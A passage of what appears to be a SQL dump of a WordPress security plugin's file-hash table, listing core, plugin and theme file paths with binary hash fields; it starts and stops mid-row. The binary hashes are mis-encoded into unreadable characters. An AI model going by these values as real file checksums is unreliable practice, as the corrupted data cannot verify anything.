','',0,'?'),('}C�B��-u�H�}�','wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',0,'3°�\nᄷ�\0�a��','3°�\nᄷ�\0�a��','`	\\XO�U>8X.�f��?��m�{\nQ]�8��','',0,'?'),('}N�1�K�\n�S�0\0�','wp-includes/wp-includes/blocks/block.php',0,'��i8��X�3����cTD','��i8��X�3����cTD','�J���$_�F�$o�����{�fC�~L�3��<','',0,'?'),('}O� !ٶ]�O�O[�','wp-includes/block-supports/typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�΁�veY�\Z��f�','�B��tٯ�@�^���5��N���XȆ<','',0,'?'),('}\\�5�\r��$�l�W���','wp-admin/js/tags-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��D��B�aB�*','$Y�Xx��93%��ftC0y�,�^���\n','',0,'?'),('}]�v�b�Z~n��:��','wp-includes/wp-includes/Requests/Exception/HTTP/501.php',0,'eڸ04�-?��ב�5','eڸ04�-?��ב�5','�k�G寲�\n΃CD#�6�u\Z�քEڣ@K1','',0,'?'),('}`��g\"P�2��V��','wp-includes/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('}�7 ޘ�DHD�Pl','wp-includes/SimplePie/Registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\���S8�X�`Yt','5\n֚�8��q�W��@��C�HҘ���\\eg','',0,'?'),('}��Nտo�p�ꛥ!','wp-includes/wp-includes/js/thickbox/thickbox.css',0,'7��P�R�n�,(�f�','7��P�R�n�,(�f�','M�ߍ��V�_�^����ol\'\0��qYL�̘)���','',0,'?'),('}�l}%CK�c}�NH��\Z','wp-content/plugins/wp-cerber/assets/flags/gr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\0�$��*0B�֏*�','����,DZ��W?������l�G��k��Qq','',0,'?'),('}�Ȑ�\\L��`���i)','wp-includes/ID3/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GؐV%�P_��շ�','�I>��a�*R8?�)�p1�U͔�?2�=o��','',0,'?'),('}����=\"$�x���','wp-content/plugins/wp-cerber/assets/flags/si.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E����z|9�','��ո�����	+���}x͐�侟�?#���','',0,'?'),('}���{RҢ���\"','wp-includes/default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����f\n��G8��','��/�R�5ڍC,�i�K�f�}���\\4/\0��','',0,'?'),('~Ⱦ/�m�ր�!��','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e4�/����','p�f*�p�m$�F���tw��F��x?�.','',0,'?'),('~��\\��_b�$�-��!','wp-includes/js/jquery/ui/selectable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!9�qf��H7�{B,�z�','W�b��v�(��F4��S�]���@Ĕ�ܾ�','',0,'?'),('~?�J�I�b*׺�e�C','wp-admin/images/resize.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN������','�6󀏸��&?�5��?s�qGM`P;','',0,'?'),('~A�H�g��KT��','wp-includes/Requests/Utility/CaseInsensitiveDictionary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:��R�K�ro�H2z','9yԆ&/AX�H�i{b���7f���rw���=m','',0,'?'),('~F��㫎>dy��j�','wp-includes/css/jquery-ui-dialog-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�+x)���A�v6@�@','�/��N��e$�������2:.�}b#�K}','',0,'?'),('~V��Xa]�7p�|R','wp-includes/class-wp-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1$�%�:��I�:��','P댭���t\\V�ܛ&��T���\Zݝ�^6�','',0,'?'),('~i�I�;ݭ]�A��S','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','54��⓿�`�����','D��Oo;o�O]+�\0���5�]/\"�޸&�Q�','',0,'?'),('~q�IP�I���r��','wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-\\�d��oG��\n��2','Sa)����ʗn&B��V�~��11�\'w�(','',0,'?'),('~w!�{i��)*���d-','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/fancy-type/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�s<���<�ey\np��','Ş�\0Ӣv�:#%/8ƿȝ╥�e)ݠ�U�','',0,'?'),('~}�{ ��>D�}�<','wp-admin/css/code-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�3�;�7��v:�P���','JlA��Z��q��F�v�<3�I^��k�','',0,'?'),('~��ReOX�f2��`�','wp-includes/class-wp-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;@A��[�oh�́F�','Bms������AKE)(|-�c����ϡ�|��d','',0,'?'),('~���v[�}�����','wp-includes/wp-includes/Requests/Exception/HTTP/404.php',0,'��c�Y\0�ys��<M','��c�Y\0�ys��<M','��-!V��>d�*jP�F�	�;QƵ��N1aG�(','',0,'?'),('~�x�J�U_<m����n','wp-includes/wp-includes/js/tinymce/utils/editable_selects.js',0,'�J��q2��I\'�J�9�E','�J��q2��I\'�J�9�E','�v��Gjs��f��	e�d�&�g��+���','',0,'?'),('~ť�s\0�1y�$�L}h','wp-config-sample.php',0,'�S�Ӌ���h��1����','�S�Ӌ���h��1����','ꐐd`�4��	�\\X��L�u��$dž��Ũdb','',0,'?'),('~�Ӹbc��\Z$�@$��*','wp-content/plugins/wordfence/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>r*������mI','E��\0�.�����¿¯�1F�(Df�u�v��˔','',0,'?'),('~�J�-��a뜄jF��','wp-includes/wp-includes/widgets/class-wp-widget-calendar.php',0,'�Y	N��ɔ]7l�','�Y	N��ɔ]7l�','M�>����f(E���r_hX���oۃ��8@�+O','',0,'?'),('~�޷d�L���\".(�','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/buttons/icons/key.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=M�������|�m�','�!�\"&\"R�0�3U��?bBRI��$ҍ�\'���','',0,'?'),('\0��g�w�kl�d�M','wp-content/themes/shootingstar/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�yX(�ƕ�[�T��','�,�}9㿽;�>4� ���~Z�7�8�\0��','',0,'?'),('�ldK�м����','wp-includes/js/dist/components.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��Z��\'%R�l�','ho]�9�O��D^;Lf�u������{','',0,'?'),('\' M�2���%�	��','wp-includes/wp-includes/js/jquery/ui/selectmenu.js',0,'o�x� eqd���$I','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('0u�R��D��{�1�','wp-content/plugins/wp-cerber/assets/flags/cg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��K����*�A4�@T$','��Ŕ���wEi�av�A}z�[ɵ�7�6C','',0,'?'),('6\0�O�kvzfTN','wp-includes/js/jquery/ui/effect-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}:h�B�կ}z�x�','�����񀨯n�\r�S�/<���b���ե]Na�','',0,'?'),('@�={&����}�_','wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}=���v�!ʸ�M','6iV��a#^n�gv�}]����@\"�ǥ{','',0,'?'),('j&��^���b����','wp-includes/ms-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ĉ�L�@�r#�}S���','4n-���J���2����T�hߕ�!�_H/Z\"�','',0,'?'),('j^��SN�-O� �','wp-includes/css/dist/components/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!���{9���YV?\'7�','���f�4qS�� \\���\'��~v���\Z�h�','',0,'?'),('tS�\"��lZ�c��Q','wp-admin/js/auth-app.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qi����~[�|\r�S','A�|f��K�\Z���F|���eɠL�e��ܬ�49','',0,'?'),('w�R1�[��P�B���z','wp-content/plugins/wp-cerber/assets/flags/rs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H]��el_L�S','9qp���p~##�7b���o����/�j|�bLl�','',0,'?'),('w�\'�Pe��F�+��V\0','wp-includes/Requests/Proxy/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/2��������)','J�6d��A��l{��Й\0������J��h','',0,'?'),('����oȂ�/	\"Y}','wp-includes/wp-includes/js/tinymce/tinymce.min.js',0,'Xl����̡C��kn','Xl����̡C��kn','�Zk�	�6|��{�*\Z��{�H����iܝk^','',0,'?'),('�m{8���]�ך��<','wp-content/plugins/wp-cerber/assets/flags/de.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����NJ&z\\ҿ~��i','�Ū3�J��:2;��;�����p�J�kL~�','',0,'?'),('����w��_gB�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',0,'�f\"����#6${ JL\'\"','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('���eP�Mde���','wp-includes/wp-includes/registration.php',0,'���S��D��31�','���S��D��31�','ՙ���vF��٫���P��B8.�����8�','',0,'?'),('��%G]f�@�%�Z��','wp-content/plugins/wordfence/views/common/section-subtitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�c��D��Ã��۬','Z�J��wsh5�M�����Eu/jg�[���-�','',0,'?'),('�(9O)O˄0�J��','wp-includes/wp-includes/js/wp-sanitize.js',0,'���:k���E�t6Q��','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('�СqD֚?�i�X','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��!(�i.+�)Қ�\"{','�Z�Q[���Q���G����7��؍E\"�','',0,'?'),('�K�Q�}U&;&���Q','wp-includes/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6y��w���N�ш','���W!�\Zس-�Y��}����M��W�e?','',0,'?'),('�tr�εF_� ���','wp-includes/js/wp-emoji-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hn�1e��胖��S�','�,H���w�0�����N<��l�\n�����!��','',0,'?'),('�͍�����ρb�B','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|DZ(���r��q֧#','�)0������+���^h��v.(��>����','',0,'?'),('�	tI��Ǵ=\r�n��','wp-includes/wp-includes/js/jquery/jquery.hotkeys.js',0,'j��hI�QLZA$Un�H�','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('�3-�����f��\n','wp-includes/css/dist/list-reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AU�L�Y����M��','�)�RfZ�����~u3����}\'�?�!>','',0,'?'),('�;��!1�>�Y�xQ�','wp-includes/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BQ�e!��J%�q��','�&#\'��/�;y6՞�%��чqedq�7W�','',0,'?'),('�Eћ�Pa\r����:�','wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',0,'��h���P���','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('�Mߋ,��/�B]WX\Z�','wp-includes/wp-includes/taxonomy.php',0,'�5��H\nC8h��:��N','�5��H\nC8h��:��N','I�\r�u}��؁���Yw�Su:<IF���','',0,'?'),('�~M���M*�Ӟ��[U','wp-includes/wp-includes/js/jquery/ui/core.js',0,'PC��\r�{�tk�\"x','PC��\r�{�tk�\"x',' �S�����3~�n�F#�EHf�_��7qY@I��','',0,'?'),('��ah�#��8�c���','wp-includes/js/tinymce/themes/inlite/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4O��DIc`��EJ','p�v�T5Z>j��j�\0\0��f��xa/g=�&�','',0,'?'),('���r=����c���Mz','wp-includes/js/dist/is-shallow-equal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���Ij�@���e�&','RX-B3�nd]{]ԃ��HʄO�o���ЏR�m���','',0,'?'),('��ں�u���M���[\r','wp-admin/images/wpspin_light-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('��Nx��ډ\Z�8yH\\�','wp-admin/js/theme-plugin-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"��[��Q�<�u�)','�s�0�r:l�\\����jަ���-�	�+#�ɣ','',0,'?'),('��sSk�i�<4\'c�-6','wp-includes/js/wp-embed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�N�O8L^�sWkJ�<','�� �E��>�@_�0���!�B����5','',0,'?'),('���e��97�aJS','wp-includes/images/smilies/icon_smile.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�.)�2���p���','ˠ�\",�Rʨ�Tr=�o��r�З:����','',0,'?'),('��XQ���d9r�ڼ��','wp-includes/customize/class-wp-customize-themes-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��vl��3��','�,V���3R�w���.���\r׭+4ݦ`=�`R','',0,'?'),('�!2�P��a��B�|Q�','wp-includes/wp-includes/class-wp-comment.php',0,'J0n�N.��yƪb��','J0n�N.��yƪb��','�}�u\0tE\n�&���yt2���B���','',0,'?'),('�45���� -�rS�','wp-content/plugins/wp-cerber/assets/flags/kz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�OC��tЛ>��i3','>ū�[h@H�X���X���Ո�k����55gD�D','',0,'?'),('�el�5�s��E�úQ�','wp-admin/js/media-upload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5�.��4�ԝ�Ξ','�����ڦ\'�D�\Z�� v��0��E~��b�','',0,'?'),('��,CUU����9i-','wp-includes/css/wp-auth-check.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��L��ԥ|l\"��','�]��\"8y����;��=X\r����Y�$��T;','',0,'?'),('��)c ����̊>�4�','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js',0,'<j��� �<Yt�#�&','<j��� �<Yt�#�&','yNOBӻ�]&6�M�-��J��.�����:.�{','',0,'?'),('���ӝ�y�_��V','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/buttons/screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��LWΦ��5ɚc��','K�X��;�I*��~��¿��/=/�5�n','',0,'?'),('���=�a�_� ��\n{�','wp-content/themes/sg-window/content-archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�=UE\"V�uVcP��','B��P�W�N0��?<��C�[ZՅ�o���?�','',0,'?'),('��i�\Z!�[�8$\"�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('������J>Uv�0�','wp-content/plugins/wp-cerber/assets/flags/kp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ze�+j�U+���]','���ĀN��ɳ���2�.�@+-���YzI','',0,'?'),('���~\"3�f��Bc��D','wp-content/plugins/wp-cerber/assets/flags/mm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CNU�����2t�J','�$�5AK�`�?w{�\'��5��0��2?II`','',0,'?'),('���[N ʩ�N:g�ܜ','wp-includes/wp-includes/images/smilies/icon_rolleyes.gif',0,'_5��6I���ĔE','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('�ȉV?	��]�)A','wp-includes/js/media-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t	���V\\E�P�[�','��,���C �A�ERo=4=^��������|','',0,'?'),('��`h�NkO�N8��','wp-includes/blocks/file/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��E��T	�P\0\\�D','kr\r���.d����y%@IX���t+��Z��','',0,'?'),('���W���=�ԘHd�z','wp-includes/class-wp-site-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*Wy�\ng�MP��)�p1','���C�ƙ&���v����\"�[�SK@�	��Π@','',0,'?'),('��X����-�4�J�_�3','wp-content/plugins/wordfence/lib/wordfenceHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!~��-i���1','P�\0�\r/��;I�\n2\'��\'�v8����%q�Dl','',0,'?'),('����\'>�[��·�','wp-admin/js/user-profile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;T\n-rh��X��	vs','K6�r4���#�wM�7f�\r����G�\\s#','',0,'?'),('��a\'�0�E�\n�j��','wp-content/plugins/wp-cerber/assets/flags/az.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dj�CO#M�P4`jz�G','=K���LJ���v͎��\ZG詋�3��z�6','',0,'?'),('���Pd������c�3','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����s�?�K��1\"','�Ĩ:E��kE��N�k\rFO>\"gvP��\"@��','',0,'?'),('�O�X�g]<f@�','wp-admin/css/farbtastic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S@��[�\\,�3|��!','�Sm�\'�;d`��e�M�0i=�?>����?{','',0,'?'),('�3��Ƈe�(ú9�','wp-includes/js/jquery/suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),('��b����N�8�hk�','wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cW�U��ԟ�`B	','w�\r��j�*�m�l]� �t��PU�\r�E��','',0,'?'),('��\\�(��wB��I�','wp-admin/network/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��	ΒRU;�pp�b�','��,�!��m4f������NR�\n���B��^','',0,'?'),('�!�M�j�Zs+p�-h�','wp-includes/wp-includes/ID3/module.tag.id3v1.php',0,'IU��.Q�c�g���','IU��.Q�c�g���','�C��BH�9��D�y�;-�K�:LAx�?8\\~�	��','',0,'?'),('�(tTlDά7&��MP.�','wp-includes/js/tinymce/tiny_mce_popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),('�/	�E:K�R寥�v�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��[�SPk�C�','��ںم�Ŵ��}C:�ø=�~��Q�(8��$Q','',0,'?'),('�2S�%Gn�o��F�\'','wp-includes/wp-includes/css/dist/block-library/editor-rtl.css',0,'�\0}3�*�?�v�+,\"','�\0}3�*�?�v�+,\"','&tT=����ȼitg`^�5����2G��Vcg<','',0,'?'),('�@�F �Ӡ(���e*[','wp-admin/js/theme-plugin-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 9��\'�74J;��~=Z�','� mُ���tz�fD��d��9�7�T��','',0,'?'),('�@�c};_K�]�=�1t','wp-includes/wp-includes/blocks/columns/block.json',0,'�q����-ڠ�t�56�','�q����-ڠ�t�56�',',C=ē0ȸ�a&�\"WӸ��Ă��0\n�(�73x','',0,'?'),('�B��ه�v<Sv稳','wp-includes/SimplePie/Parse/Date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\\�O2�����C[\nջ','�=��<��ei|�M�qZ]V[]&I-q9)g�0','',0,'?'),('�F� �GJ��B��s7�','wp-includes/js/media-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӷsj�~�MP����+','���7��}Z��9��ڜ<r���kV~��','',0,'?'),('�W= \\\'x\"�W��}��d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���թ�K���^㥾�','�M�8:�naƋGZ�qQdý!����\'��&g1','',0,'?'),('�w��5���)���','wp-includes/css/wp-embed-template-ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)6��	؞мq ���','�o��+8]�Su�H.�C�g��R9�&�+���\\W�','',0,'?'),('��Ǚ�\\} ��m�X�w�','wp-includes/wp-includes/SimplePie/Credit.php',0,'.�6�K>.��L��','.�6�K>.��L��','r�ٴ��@c�@���{R�CG����d^�>>E\Z','',0,'?'),('��\0���+OW+�','index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�]�#��N�X�,�','�Dz�\n�}_��7x,�9�t:��\'�\r����','',0,'?'),('�����A���1\Z�;�','wp-includes/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4|����e��(r',':��.,�0aH�A��\05:�f�s\nf������','',0,'?'),('��?�;��fM�!Gn','wp-includes/wp-includes/js/dist/editor.js',0,'�&�60���6�k�/��','�&�60���6�k�/��','�O}���j�\\Eнe��(BL\Z$�핓1','',0,'?'),('���]�5�K���^\r�','wp-content/plugins/wp-cerber/admin/cerber-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2��b;��Vs��5���','�#z\05�ӊ;��:�b��	VJ�X>8��Nk','',0,'?'),('���*e����Pn','wp-includes/wp-includes/class-wp-block-pattern-categories-registry.php',0,'�T��i���詿/�!','�T��i���詿/�!','��(Y�E�U��<d�y���K	2�bsy�Z�L�','',0,'?'),('���Z<���q�x�','wp-includes/wp-includes/SimplePie/Content/Type/Sniffer.php',0,'JVP�t>%N����\0','JVP�t>%N����\0','\n��S/��̼#@��%���,�ul��$t���T��','',0,'?'),('���v�A\nGr�3C9`','wp-admin/includes/class-wp-internal-pointers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^I[8T䍍�\\��=','Y^9�A\r+^-��iL�W��j��O���F��','',0,'?'),('�\Z�R虒�<Fc֛;�','wp-content/plugins/wp-cerber/assets/flags/mp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4^�>!i��2D�h�','�k\"�z�ƽ��A��i�s\"A�ǽ��(\Z9','',0,'?'),('�Ebl8�y���}����','wp-includes/js/tinymce/plugins/link/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),('�V*ν���s��r�','wp-includes/wp-includes/css/dist/editor/style-rtl.css',0,'�Z���Ey��,��~','�Z���Ey��,��~','��t>\'�\"A�†ˊ��	�QN��\Z�gH��','',0,'?'),('�W~�\0��u����','wp-includes/wp-includes/SimplePie/Sanitize.php',0,'u�l����fp��x��','u�l����fp��x��','���O\nQp���5�A�~������j��xt�','',0,'?'),('�`.dY,�o�u�dƋ','wp-includes/wp-includes/js/tinymce/themes/modern/theme.js',0,'�(3�o�U�2ŝU�2�','�(3�o�U�2ŝU�2�','�2.�pt�\"r�`)��\r.C�l�\\\Z��BIX','',0,'?'),('�iT�\\��p�tg.~�','wp-includes/wp-includes/css/jquery-ui-dialog-rtl.min.css',0,'u�+x)���A�v6@�@','u�+x)���A�v6@�@','�/��N��e$�������2:.�}b#�K}','',0,'?'),('�m>�\0��0X&�^�Q','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pKz��`�)9_@�','��aғYe�q�7YTc�Ȋi$�W�ت�/�!�,','',0,'?'),('�s���ݓ�	��&�','wp-includes/wp-includes/css/dist/block-library/common-rtl.min.css',0,'ne��:ʎ)����hVH','ne��:ʎ)����hVH','�v7��7��a�L�zи�?9!D��4�','',0,'?'),('���\'q�F�NM��_��','wp-includes/wp-includes/block-supports/generated-classname.php',0,'f	o��I1Z�N}v�-','f	o��I1Z�N}v�-','̈́q}�0N�PvQ�&k����T�@/`v�','',0,'?'),('��|�Aι�$PƼ','wp-includes/wp-includes/customize/class-wp-customize-background-position-control.php',0,'�QJt\"��!!�_�^	','�QJt\"��!!�_�^	','�릟�/Ԥ�o�kroQ���|E��Q�Z݁\ro','',0,'?'),('��?���z6���aDz','wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('��vs�p�~�X�M���','wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.js',0,'-��?��ES+�','-��?��ES+�','���,��OT[9�pm��Ỵ�Ó,�����=f�','',0,'?'),('��R�\Z�F߱�H���','wp-includes/wp-includes/js/dist/data.js',0,'8;����2��/���G','8;����2��/���G','�e\\���%��`#J˘��\n��Ú�n��̭7�','',0,'?'),('���ʆ��n�D㮖�(','wp-admin/css/install.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�],�:��f��3','�(��Ty��0-��#�FOs�;�=��K�o�','',0,'?'),('��j����5��f�j�','wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��L|�y+5*�M\0Qk','�����O�q��Fri���e�+�K�	�/;C','',0,'?'),('�)ũ��2[�	�4�_a','wp-includes/class-walker-category-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��s�ny�ld�)��','�ՠ���P)_�s�)v]��Չ\"����|�','',0,'?'),('�+o�2��8�E�+K%;�','wp-includes/PHPMailer/PHPMailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�\n�L�)��8�','�GK#I:�4ڄ`��\'�x�ժ\\���_இ6�','',0,'?'),('�:+[��g��CZ���','wp-includes/template-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�	ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),('�B��[�\\�����|k','wp-includes/wp-includes/js/heartbeat.min.js',0,'�^���@H�l�\Z�g2�','�^���@H�l�\Z�g2�','e�x\'�s��v+�q�LW����/,��k�g%\0�','',0,'?'),('�H�F���I!���M9','wp-content/plugins/wp-cerber/assets/crb-logo-vn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��h��%t�J���','�Q��6�������V���\0\r��M�9��','',0,'?'),('�T3ji��w\rZ�\"<h','wp-includes/wp-includes/ID3/license.txt',0,'GؐV%�P_��շ�','GؐV%�P_��շ�','�I>��a�*R8?�)�p1�U͔�?2�=o��','',0,'?'),('�i2O�׍��+�s�X.�','wp-includes/js/jquery/ui/core.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PC��\r�{�tk�\"x',' �S�����3~�n�F#�EHf�_��7qY@I��','',0,'?'),('�l��j�&���`C%�','wp-content/themes/sg-window/img/icons/small/flickr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Z\\s}�h�Fr²ٻ1d','�X�`�ANB��S��K\"���0=���K�>��','',0,'?'),('���΍cDޮ��;p�D','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.css',0,'ꕂv��EK�‡?\r�~_','ꕂv��EK�‡?\r�~_','!?�[��_���r��=&�\n�-%!y��\r�','',0,'?'),('���P���M�˝�=U','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','raX\'��z\05+�\"�7','v�$�r�_s�y�Y���U{ؘ?��C','',0,'?'),('���hg�	��>n�dZ','wp-includes/wp-includes/sodium_compat/src/Compat.php',0,'$?6/�%��k�<j��@�','$?6/�%��k�<j��@�','����\r�/�t��:to���7�L�~���QLl~S','',0,'?'),('���